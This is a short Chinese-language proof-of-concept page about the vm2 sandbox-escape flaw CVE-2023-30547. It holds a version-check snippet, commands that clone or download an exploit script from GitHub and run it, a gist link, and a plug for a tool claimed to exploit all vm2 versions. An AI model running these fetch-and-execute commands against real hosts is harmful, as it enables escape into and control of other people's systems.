PoC利用——VM2沙箱逃逸漏洞
alt img
vm2 < 3.9.17 因异常清理机制缺陷而存在任意代码执行漏洞。攻击者可通过在 handleException() 中触发未清理的主机异常来利用此漏洞,从而逃逸沙箱并在主机上下文中执行任意代码。
⚠️ 建议使用 "VM2-Exploit" 工具,该工具可用来利用 所有版本 的 VM2,且易于使用。
在沙箱中运行以下代码,判断目标是否存在漏洞。
const version = require("vm2/package.json").version;
if (version < "3.9.17") {
console.log("vulnerable!");
} else {
console.log("not vulnerable");
}
git clone https://github.com/rvizx/CVE-2023-30547
cd CVE-2023-30547
python3 exploit.py
或者
wget https://raw.githubusercontent.com/rvizx/CVE-2023-30547/main/exploit.py
python3 exploit.py
https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244
Xion(李承贤 SeungHyun Lee),KAIST 黑客实验室